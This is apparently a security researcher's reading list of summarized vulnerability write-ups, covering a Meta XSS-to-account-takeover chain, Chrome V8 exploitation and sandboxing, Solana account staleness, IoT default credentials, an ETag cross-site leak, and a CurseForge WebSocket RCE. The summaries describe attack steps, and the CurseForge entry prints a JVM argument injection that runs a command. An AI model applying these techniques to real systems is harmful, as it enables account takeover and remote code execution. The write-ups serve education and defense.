Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Multiple XSS in Meta Conversion API Gateway Leading to Zero-Click Account Takeover- 1863

ysamm    Reference →Posted 2 Months Ago
  • The Meta Conversions API Gateway is a server-side mechanism for businesses to send web events to bypass browser-based tracking methods like the Facebook Pixel. Even if a user has cookies disabled, ad blockers on, or other browser restrictions, this method still works.
  • The API gw.conversionsapigateway.com is Meta's own deployment of the application. The fbq JavaScript module includes the collection/processing module in a JavaScript file named capig-events.js. Any vulnerability in this script could inherit the privileges of the site it's on, such as business.facebook.com.
  • capig-events.js only triggers when the page has an opener window. This event includes various pieces of data, such as the message type. If the type is IWL_BOOTSTRAP then the script will check if the pixel_id exists in the list. The event origin is never explicitly verified, meaning that this can be called from any origin.
  • After some processing, the event.origin is used in order to dynamically load JavaScript via <origin>/sdk/<pixel_id>/iwl.js. Since an attacker can control the origin of arbitrary loaded JavaScript, this creates the opportunity for some nasty XSS. This is a classic case of not validating the origin data from a post message call and using the data anyway.
  • This isn't immediately exploitable because a CSP and Cross-Origin-Open-Policy (COOP) are enabled. CSP is setup to not allow arbitrary external scripts and most pages include a COOP of same-origin-allow-popups. On the surface, this appears to prevent the issue. However, the security is not evaluated on a single page or a single policy; it is evaluated across all contexts where the code runs.
  • For a CSP bypass, some major pages allow third-party analytics providers to be on the page. This expands the attack surface where XSS or a subdomain takeover would do the job. For the COOP bypass, an attacker can regain access to an opener by reusing a window.name. They found a vulnerability in a third-party application that allowed them to hijack the iframe to interact with the page with a CSP allowed site. Here's the full exploit chain:
    1. Load URL inside of Facebook application.
    2. Perform the opener bypass to a less strict CSP location.
    3. Hijack the iFrame of the third-party site. This sends a postMessage to the parent window to trigger the exploit.
    4. Host an attacker-controlled JavaScript file on the third-party host with the malicious JavaScript. Script is executed in the context of www.meta.com.
    5. They took this to a full account on facebook by abusing CORS permissions.
  • After reporting the previous vulnerability, they decided to review how the conversions API actually worked. When loaded on Meta, it displayed a graphical tool to the user. After experimenting with some of the rules for events and parameters, they noticed a POSt request for adding a rule. Upon reviewing the source, they noticed that the rule information was dynamically generating JSON within the capig-events.js script.
  • The JSON keys are supplied in the request and are used to construct a JavaScript string without any escaping or validation. So, "]} could be used to add attacker-controlled JavaScript in the generated output. In practice, this creates stored XSS within the capig-events.js file. Notably, the payload is served to every user, including Meta-owned domains. This isn't just stored XSS; this is a supply chain attack.
  • The author of the post got paid $62K for the first bug and $250K for the second bug. Absolutely insane! I really appreciate the author's intricate knowledge of Meta applications. On the first bug, the CSP and COOP issues would have been easy to move on from, since they couldn't be exploited immediately. Instead, they already had either A) the gadgets ready to go for this or B) known where to find them. This knowledge has served this security researcher very well!

The V8 (Heap) Sandbox - 1862

v8    Reference →Posted 2 Months Ago
  • v8 is a JavaScript engine that compiles JavaScript code into native machine code to make execution faster. The v8 Sandbox, a lightweight sandbox, is now a stable feature in Chrome. Why is this sandbox needed? Chrome is a huge target with a difficult history of memory corruption issues; these aren't classic memory corruption issues like UAF, and OOB reads though. These are very subtle logic issues that make languages like Rust or new features like memory tagging not useful.
  • The author includes an example that could likely lead to memory corruption from side effects. It's possible this could be solved by a good compiler check, like in Rust but this misses a fundamental issue with v8. v8 itself is a compiler! Memory safety cannot be guaranteed if the compiler is part of the attack surface.
  • Why doesn't memory tagging work though? A CPU side channel, which can easily be exploited in JavaScript because it's arbitrary code, can be used to leak these values. Hence, the attacker can bypass the mitigation. Additionally, due to pointer compression, there is no room in the bigs for v8.
  • The solution to this is using a sandbox to isolate the V8 heap's memory such that memory corruption cannot spread to other parts of the process memory. This is similar to userspace and kernel space in operating systems. The idea is that a bug in v8 shouldn't affect the rest of the hosting process.
  • In practice, the sandbox is replacing all data types that can access out-of-sandbox memory with sandbox-compatible alternatives. In particular, pointers and 64-bit sizes must be removed because an attacker could corrupt them. Due to constraints, the V8 heap is the only thing within the sandbox. They have a nice image that shows the security of it. The v8 objects are effectively entries into a table outside of the sandbox. This table entry then points to the external object. If you can only control the table index, there is not much you can do to exploit this.
  • This isn't perfect though. There are several invariants that this changes. For instance, they show an example with code that assumes that the number of properties stored in a JSObject is less than the total number of properties of the object. Theoretically, an attacker could corrupt one of them to break this invariant, leading to an out-of-sandbox access.
  • According to the author, this is okay though. First, many of these are simply memory corruption issues that can be fixed via simple bounds checks or UAF checks. These sandbox bugs are preventable by many other security features, such as Chrome's libc++ hardening.
  • To create a security boundary, it must be testable, and be created with a specific attacker model in mind. The attack model is assumed to have read/write access inside the v8 sandbox, with the goal of corrupting memory outside of it. To make this testable, debug builds include a memory-corruption API that can be used to read/write within the sandbox. Finally, they have a sandbox testing mode that determines whether a write violates the invariants.
  • A fantastic post on the v8 sandbox and the more in-depth v8 heap sandbox. I appreciated the well-defined threat model around the protection the most.

From object transition to RCE in the Chrome renderer- 1861

Man Yue Mo - GitHub    Reference →Posted 2 Months Ago
  • In JavaScript interpretters, there's a map (known as a hidden class) that represents the memory layout of a object. A map holds an array of property descriptors that contain information about each property, as well as the elements and their types. These maps are shared between objects that have the same layout. If a map doesn't exist, then a new one is created. When this happens, the old and new map are related by a transition that occurs to go from one map to another.
  • When doing this transition, the old map and new map have coinciding pointers to each other. A map can have multiple transitions. For instance, if property b is added and then property c is added, this creates two transition objects. If a field type is changed, such as going from an integer to a double, the map of the object is changed to reflect this via a transition.
  • In the example above, with o1 and o2 having a as an integer, if o1 gets a set to a double then the map in o2 is set to deprecated. This is because SMI (internal small integer) can be represented by a more generalized value. Eventually, the o2 object will be updated to the map of o1 once a property is accessed.
  • In v8, object properties can be stored in an array or a dictionary. Objects with properties stored in an array are fast objects while objects within properties in dictionaries are dictionary objects. Map transitions and deprecations specific to fast objects. Normally, when a map deprecation occurs, another fast map is created, but it's possible to make this not happen. In particular, if there are too many transitions in an object, then a new dictionary map is created instead.
  • Most uses PrepareForDataProperty are safe, there are two locations where the type can be updated to a dictionary map instead of the original object map. In CreateDataProperty, it may result in a dictionary map after an update. There are multiple routes to this but the usage of the spread syntax ended up being the most interesting.
  • When using the spread syntax (...obj1) and the usage of a property accessor, the function CreateDataProperty will be called while it's being cloned. While this cloning is happening, it's possible to deprecate the map while it's being used for the clone. This allows for the updated map to be a fast map instead of a dictionary map! A type confusion in the JavaScript engine leads to memory corruption now.
  • To exploit this, they used the type confusion to overwrite the elements to a large value within the underlying data structure for NameDictionary. By doing this, we get an OOB read for property values that leads to improper object access. Creating a "fake object primitive" is one of the best primitives in JavaScript engine exploitation. So, just arrange the heap in a nice way to create a fake object.
  • Once there, an arbitrary read/write is easy to gain. First, place an object into an array and use the OOB read to read the addresses of the objects stored within the array. For a write, do the same thing as a read but write to these objects instead.
  • Chrome recently implemented the V8 heap sandbox to isolate the V8 heap from other process memory, such as code, to prevent corruption within the V8 heap and access to other memory. So, to get code execution, it's a requirement to escape this requirement. To work around this, they modified DOM objects implemented in Blink. These are objects allocated outside of the v8 heap but are represented as API objects in v8. By causing type confusion in the API calls, it's possible to obtain a read/write primitive over the entire memory space.
  • Overall, a good post on exploitation and how to bypass a new defense-in-depth measure. Great stuff! If I had to guess how this bug was found, the author found a side effect that was not accounted for in some paths.

Why Anchor Accounts Go Stale After CPI (and When to Reload)- 1860

Taichi Audits    Reference →Posted 2 Months Ago
  • When making a Cross Program Invocation (CPI) in Solana via invoke or invoke_signed, you provide a set of accounts to be used. In raw Solana, you pass in AccountInfo directly, which is a handle to the in-memory runtime state. In Anchor, you pass in Account<'info, T>., which is a deserialized version of T and acts as a cached value.
  • Native Solana programs do not operate on the ledger directly. Instead, accounts are loaded into the runtime as a working set. Instructions mutate this in-memory state. Many things, like lamports, are read directly from the runtime state every time. If you reborrow the data, then the underlying bytes will also be updated.
  • In Anchor, the type T on the AccountInfo is a deserialized snapshot of the account data bytes. At the start of the instruction, Anchor constructs the accounts by deserializing them in a generated handler from the info.data on the account. This means that the data is copied onto the stack/heap as a Rust value and is NOT a live reference to the runtime bytes. At the end of the instruction, Anchor will serialize the data structure and write it back to the runtime.
  • In practice, this has a strange consequence: if a CPI modifies an account, the cached version will have stale data. For instance, for balance on a token account, a token transfer would show the same balance before and after the CPI, regardless of whether the account balance changed.
  • To solve this problem, Anchor accounts have reload(). This will reload the data from storage via re-reading and deserializing the data within AccountInfo.data. The account data is now no longer stale.
  • The author gives some tips on when to call reload(). It's required when A) a CPI can be used to mutate account data, B) the account needs to be read/validated later and C) you are reading a cached struct. If lamports or native runtime fields are being read, then reloading isn't necessary.
  • Overall, a great post on Solana CPI reloading and why it must be done. I had always wondered why lamports didn't need to be reloaded but the data did; now I know!

Insecure by Design: Default Configurations in Embedded Systems- 1859

Kevin Chen    Reference →Posted 2 Months Ago
  • The IoT OWASP top 10 includes Insecure Default Settings. To the author, this means a configuration that is insecure by default, a setting that the user must explicitly change, or a setting that is bad and unchangeable. They have several examples of this in the article.
  • The first target is the Kobo eReader, an alternative to Amazon Kindles. Using a debug shell, the default credentials are admin:admin. So, with access to a device, it's possible to login to it. Additionally, there is no key signing so it's trivial to reflash the firmware with arbitrary code.
  • The next thing they looked at was a Bitcoin ATM Kioisk. After clicking around for a while, they were able to access the Windows control panel. With access to the system logged in as an administrator, it would have been possible to backdoor the entire thing. To demonstrate this, they used Minikatz to extract creds and ran Doom on it.
  • A good post on some real-world issues. Insecure defaults have existed for years and will likely continue to do so. Good finds!

The economic failures of penetration testing- 1858

Zeyu    Reference →Posted 2 Months Ago
  • The failure of the penetration testing market is framed as a technical problem. According to this author, they feel that it's an economic incentives problem. It rewards the appearance of security over the actual reduction of risk at the company. Because of this, "it is not a market for outcomes, it is a market for signals."
  • The author compares the market to used car sales. The seller knows more about the car's quality than the buyer. So, the price averages out to an expected quality, leaving the higher-quality companies out of business. In pentesting, it's much of the same: the buyer doesn't know where the quality stands. So, they buy certifications and compliance rather than actual security. This leaves us at an equilibrium where an acceptable pentest is all that is gotten.
  • The next issue is around bad incentives. Security teams are evaluated on the audit access rather than the security posture. This makes them incentivized to commission work to pass compliance checks with minimal friction. If a pentest uncovers real issues, this is too much work to deal with and looks bad on them. Because of the friction of fixing issues, insecurity becomes a form of organizational equilibrium
  • Compliance creates a distorted inventory by acting as a demand proxy for security. Pentests are bought not to find issues but to deal with a checklist. Success is often defined by the existence of a report and not the absence of exploitation paths.
  • Flat fees/hourly rates in pentesting make this all a race to the bottom in price. This creates a market where firms reduce costs through checklists and junior staffing. Why is price competed on? The quality of a pentest is largely unobservable. The market prices are not for risk reduction but plausibility deniability.
  • They have a few recommendations on how to fix this in the future: it's all about aligning incentives. For the pentesters, we should move away from one-off pentests to long-term engagements with continuous outcomes from the seller. Right now, compliance is considered security, which is bad. Compliance is a lagging indicator of security. They should be the byproducts of a secure system and not the objective by itself.
  • In general, the market doesn't value high-signal work because it costs more money and it creates unwanted work. They have a great quote at the end that sums everything up: "hey mirror the broader economics of prevention: costs are immediate, benefits are invisible, and success is defined by the absence of events that cannot be proven to have been avoided."

Solana Forking- 1857

surfpool    Reference →Posted 2 Months Ago
  • Solana forking doesn't really exist. This is an amazing innovation for writing proof of concepts locally.

Ethereum Tools by Recon (Free)- 1856

Recon    Reference →Posted 2 Months Ago
  • There are many great free tools on this website for many things. EVM Bytecode analysis, storage slot preimages, invariants sandbox... lots of good stuff!

Cross-Site ETag Length Leak- 1855

Takeshi Kaneko (arkark)    Reference →Posted 2 Months Ago
  • The author of this post found an unintended way to solve a CTF challenge by exploiting a new cross-site leak (XSLeaks) technique. So, they made this into a standalone challenge for this CTF. The challenge had a single solve.
  • The setup is a note-taking app where GET / returns the notes, with a search parameter in query, and a note can be created via POST /new, which is vulnerable to CSRF. One of the notes on the bot contains the flag, and it's your job to steal it from another JavaScript tab. The timeout is 60s but there's no HTML injection, no sorting, no CSS and no other loaded resources.
  • The ETag header is an HTTP response header that acts as a unique identifier for a specific version of a web resource. It's useful for caching data more effectively. Mozilla docs. The application sets the tag via jshttp/etag, which formats the content size in hex as a prefix. The ETag length can differ by 1 depending on the response size and is controlled because of the CSRF bug.
  • This is the beginning of the primitive. What can you do with this? If a response includes the ETag header, subsequent requests will use the same URL with the If-None-Match header containing the ETag. Many web servers have a maximum size for request headers and will output a 431 Request Header Fields Too Large error if exceeded.
  • By padding the URL so that the overall header size is right at the threshold, the extra If-None-Match byte can be the difference between a 200 Ok and a 431. Using the search, this can be abused to check whether the searched bytes match or not, cross-origin. But, can you see this? Cross-origin status codes are opaque!
  • Chrome has a behaviour where the browser may or may not push an entry to the page history. If the same URL is accessed twice in a row but the second navigation fails, only one history event is added. If they both succeed, then two events are added. By looking at the number of entries in the page history, we can determine whether the navigation succeeded or failed.
  • Putting this altogether, the exploit has a few steps:
    1. Use the CSRF creation of notes to fine-tune the number of bytes on a page to be on the boundary.
    2. URL pad the SECOND request near the Node's header-size threshold.
    3. Measure the history.length of the frame to see whether the second navigation occurred or not.
    4. Repeat character by character until the flag is leaked.
  • In the unintended solution of another challenge, they used the presence of an ETag header to cause the same issue.
  • Overall, a great post on a new XS-Leaks technique! These are always really complicated and really subtle, so I appreciated the new write-up for it.

When WebSockets Lead to RCE in CurseForge - 1854

Elliott.diy    Reference →Posted 2 Months Ago
  • The author of this post had recently found an RCE in a VPN client called SuperShy. After finding this bug, they were curious about other services that exposed WebSockets locally on their system. They noticed that CurseForge was doing this, a widely used video game modding platform.
  • To actually find the websocket, they used something like Wireshark to see what was going on. Every time CurseForge was launched, they would see a payload for a typical launch message. Notably, it had AdditionalJavaArguments inside of it, a type and a Name that looked like Java functions.
  • Websockets are not bound to the Same Origin Policy (SOP) as HTTP requests are. As long as the server allows requests from any origin, it's allowed. The message contained no origin check, no authorization mechanism, or anything else. So, they tried connecting from a Websocket with a bogus origin header, and it worked. This means the application can be accessed from any website the user visits. Neat!
  • There were several actions but a single one stood out: minecraftTaskLaunchInstance. It contains a parameter for arbitrary additional Java arguments that is used to start the game. Another interesting one is createModpack. This is creating a modpack on the user's system. This is required because we need a valid modpack to call minecraftTaskLaunchInstance with.
  • The author used a clever trick to trigger arbitrary code. First, they pass -XX:MaxMetaspaceSize=16m; this limits the JVM's memory space. Since the JVM crashes, it will call an out-of-memory handler, which can be anything. The second flag is -XX:OnOutOfMemoryError="cmd.exe /c calc", that gets triggered on crash.
  • The CurseAgent doesn't bind its WebSocket server to a fixed port. It listens to a randomly assigned local port whenever the launcher starts. So they wrote a JavaScript scanner that scans 16K ports to find this.
  • Good write-up! To fix the bug, CurseForge no longer exposes the WebSocket server; I don't know what they use for this functionality instead.